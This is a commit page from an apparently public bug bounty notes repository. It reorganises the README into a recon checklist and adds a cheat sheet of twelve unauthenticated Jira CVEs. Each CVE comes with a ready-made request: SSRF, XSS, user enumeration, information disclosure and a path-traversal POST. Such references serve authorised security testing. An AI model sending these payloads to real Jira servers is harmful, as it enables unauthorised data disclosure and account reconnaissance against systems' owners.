crash.software
Projects
Pull Requests
Issues
Builds
AllAboutBugBounty
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY AllAboutBugBounty Commits e5fe7019
🤬

  • Grouping, Added Jira CVE, Updated Readme

  • Loading...
  • MD15 committed 3 years ago
    e5fe7019
    1 parent 191cab13
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • Bypass 2FA.md Bypass/Bypass 2FA.md
    Content is identical
  • Bypass 403.md Bypass/Bypass 403.md
    Content is identical
  • Bypass CSRF.md Bypass/Bypass CSRF.md
    Content is identical
  • Bypass Captcha.md Bypass/Bypass Captcha.md
    Content is identical
  • Bypass File Upload.md Bypass/Bypass File Upload.md
    Content is identical
  • Bypass Rate Limit.md Bypass/Bypass Rate Limit.md
    Content is identical
  • ■ ■ ■ ■ ■ ■
    Misc/Recon.MD
    1  -# Bug-Bounty-Recon
    2  - 
    3  -## Small Scope
    4  -### Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs. like: app.harshbothra.tech
    5  -- [x] Directory Enumeration
    6  -- [x] Technology Fingerprinting
    7  -- [x] Port Scanning
    8  -- [x] Parameter Fuzzing
    9  -- [x] Wayback History
    10  -- [x] Known Vulnerabilities
    11  -- [x] Hardcoded Information in JavaScript
    12  -- [x] Domain Specific GitHub & Google Dorking
    13  -- [x] Broken Link Hijacking
    14  -- [x] Data Breach Analysis
    15  -- [x] Misconfigured Cloud Storage
    16  -## Medium Scope
    17  -### Usually the scope is wild card scope where all the subdomains are part of scope. like: Scope: *.harshbothra.tech
    18  -- [x] Subdomain Enumeration
    19  -- [x] Subdomain Takeover
    20  -- [x] Probing & Technology Fingerprinting
    21  -- [x] Port Scanning
    22  -- [x] Known Vulnerabilities
    23  -- [x] Template Based Scanning (Nuclei/Jeales)
    24  -- [x] Misconfigured Cloud Storage
    25  -- [x] Broken Link Hijacking
    26  -- [x] Directory Enumeration
    27  -- [x] Hardcoded Information in JavaScript
    28  -- [x] GitHub Reconnaissance
    29  -- [x] Google Dorking
    30  -- [x] Data Breach Analysis
    31  -- [x] Parameter Fuzzing
    32  -- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
    33  -- [x] IP Range Enumeration (If in Scope)
    34  -- [x] Wayback History
    35  -- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
    36  -- [x] Heartbleed Scanning
    37  -- [x] General Security Misconfiguration Scanning
    38  -## Large Scope
    39  -### Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
    40  -- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) ​
    41  -- [x] Subsidiary & Acquisition Enumeration (Depth – Max)​
    42  -- [x] Reverse Lookup
    43  -- [x] ASN & IP Space Enumeration and Service Identification​
    44  -- [x] Subdomain Enumeration
    45  -- [x] Subdomain Takeover
    46  -- [x] Probing & Technology Fingerprinting
    47  -- [x] Port Scanning
    48  -- [x] Known Vulnerabilities
    49  -- [x] Template Based Scanning (Nuclei/Jeales)
    50  -- [x] Misconfigured Cloud Storage
    51  -- [x] Broken Link Hijacking
    52  -- [x] Directory Enumeration
    53  -- [x] Hardcoded Information in JavaScript
    54  -- [x] GitHub Reconnaissance
    55  -- [x] Google Dorking
    56  -- [x] Data Breach Analysis
    57  -- [x] Parameter Fuzzing
    58  -- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
    59  -- [x] IP Range Enumeration (If in Scope)
    60  -- [x] Wayback History
    61  -- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
    62  -- [x] Heartbleed Scanning
    63  -- [x] General Security Misconfiguration Scanning
    64  -- [x] And any possible Recon Vector (Network/Web) can be applied.​
    65  - 
    66  -Source: [Link](https://www.xmind.net/m/hKKexj/)
  • ■ ■ ■ ■ ■ ■
    Misc/Unauthenticated Jira CVE.md
     1 +# Unauthenticated Jira CVEs
     2 +1. CVE-2017-9506 (SSRF)
     3 +```
     4 +https://<JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
     5 +```
     6 +2. CVE-2018-20824 (XSS)
     7 +```
     8 +https://<JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
     9 +```
     10 +3. CVE-2019-8451 (SSRF)
     11 +```
     12 +https://<JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:[email protected]
     13 +```
     14 +4. CVE-2019-8449 (User Information Disclosure)
     15 +```
     16 +https://<JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
     17 +```
     18 +5. CVE-2019-8442 (Sensitive Information Disclosure)
     19 +```
     20 +https://<JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
     21 +```
     22 +6. CVE-2019-3403 (User Enumeration)
     23 +```
     24 +https://<JIRA_URL>/rest/api/2/user/picker?query=<USERNAME_HERE>
     25 +```
     26 +7. CVE-2020-14181 (User Enumeration)
     27 +```
     28 +https://<JIRA_URL>/secure/ViewUserHover.jspa?username=<USERNAME>
     29 +```
     30 +8. CVE-2020-14178 (Project Key Enumeration)
     31 +```
     32 +https://<JIRA_URL>/browse.<PROJECT_KEY>
     33 +```
     34 +9. CVE-2020-14179 (Information Disclosure)
     35 +```
     36 +https://<JIRA_URL>/secure/QueryComponent!Default.jspa
     37 +```
     38 +10. CVE-2019-11581 (Template Injection)
     39 +```
     40 +<JIRA_URL>/secure/ContactAdministrators!default.jspa
     41 + 
     42 +* Try the SSTI Payloads
     43 +```
     44 + 
     45 +11. CVE-2019-3396 (Path Traversal)
     46 +```
     47 +POST /rest/tinymce/1/macro/preview HTTP/1.1
     48 +Host: {{Hostname}}
     49 +Accept: */*
     50 +Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
     51 +Referer: {{Hostname}}
     52 +Content-Length: 168
     53 +Connection: close
     54 + 
     55 +{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}}
     56 + 
     57 +*Try above request with the Jira target
     58 +```
     59 +12. CVE-2019-3402 (XSS)
     60 +```
     61 +https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
     62 +```
  • ■ ■ ■ ■ ■ ■
    README.md
    1  -# AllAboutBugBounty
    2  -All about bug websites (bypasses, payloads, and etc)
     1 +# All about bug bounty
     2 + 
     3 +## List
     4 +- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Account%20Takeover.md)
     5 +- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
     6 +- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
     7 +- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
     8 +- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
     9 +- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
     10 +- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Password%20Reset%20Flaws.md)
     11 + 
     12 +## List Bypass
     13 +- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
     14 +- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
     15 +- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
     16 +- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
     17 +- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
     18 +- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
     19 + 
     20 +## List CMS
     21 +- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md)
     22 + 
     23 +## List Framework
     24 +- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
     25 +- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
     26 + 
     27 +## Miscellaneous
     28 +- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
     29 + 
     30 +## Reconnaissance
     31 +* ### __Small Scope__
     32 +Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs.
     33 +- [x] Directory Enumeration
     34 +- [x] Technology Fingerprinting
     35 +- [x] Port Scanning
     36 +- [x] Parameter Fuzzing
     37 +- [x] Wayback History
     38 +- [x] Known Vulnerabilities
     39 +- [x] Hardcoded Information in JavaScript
     40 +- [x] Domain Specific GitHub & Google Dorking
     41 +- [x] Broken Link Hijacking
     42 +- [x] Data Breach Analysis
     43 +- [x] Misconfigured Cloud Storage
     44 +* ### __Medium Scope__
     45 +Usually the scope is wild card scope where all the subdomains are part of scope
     46 +- [x] Subdomain Enumeration
     47 +- [x] Subdomain Takeover
     48 +- [x] Probing & Technology Fingerprinting
     49 +- [x] Port Scanning
     50 +- [x] Known Vulnerabilities
     51 +- [x] Template Based Scanning (Nuclei/Jeales)
     52 +- [x] Misconfigured Cloud Storage
     53 +- [x] Broken Link Hijacking
     54 +- [x] Directory Enumeration
     55 +- [x] Hardcoded Information in JavaScript
     56 +- [x] GitHub Reconnaissance
     57 +- [x] Google Dorking
     58 +- [x] Data Breach Analysis
     59 +- [x] Parameter Fuzzing
     60 +- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
     61 +- [x] IP Range Enumeration (If in Scope)
     62 +- [x] Wayback History
     63 +- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
     64 +- [x] Heartbleed Scanning
     65 +- [x] General Security Misconfiguration Scanning
     66 +* ### __Large Scope__
     67 +Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization.
     68 +- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) ​
     69 +- [x] Subsidiary & Acquisition Enumeration (Depth – Max)​
     70 +- [x] Reverse Lookup
     71 +- [x] ASN & IP Space Enumeration and Service Identification​
     72 +- [x] Subdomain Enumeration
     73 +- [x] Subdomain Takeover
     74 +- [x] Probing & Technology Fingerprinting
     75 +- [x] Port Scanning
     76 +- [x] Known Vulnerabilities
     77 +- [x] Template Based Scanning (Nuclei/Jeales)
     78 +- [x] Misconfigured Cloud Storage
     79 +- [x] Broken Link Hijacking
     80 +- [x] Directory Enumeration
     81 +- [x] Hardcoded Information in JavaScript
     82 +- [x] GitHub Reconnaissance
     83 +- [x] Google Dorking
     84 +- [x] Data Breach Analysis
     85 +- [x] Parameter Fuzzing
     86 +- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.)
     87 +- [x] IP Range Enumeration (If in Scope)
     88 +- [x] Wayback History
     89 +- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc.
     90 +- [x] Heartbleed Scanning
     91 +- [x] General Security Misconfiguration Scanning
     92 +- [x] And any possible Recon Vector (Network/Web) can be applied.​
    3 93   
     94 +Source: [Link](https://www.xmind.net/m/hKKexj/)
     95 + 
     96 +## Coming Soon!
Please wait...
Page is in error, reload to recover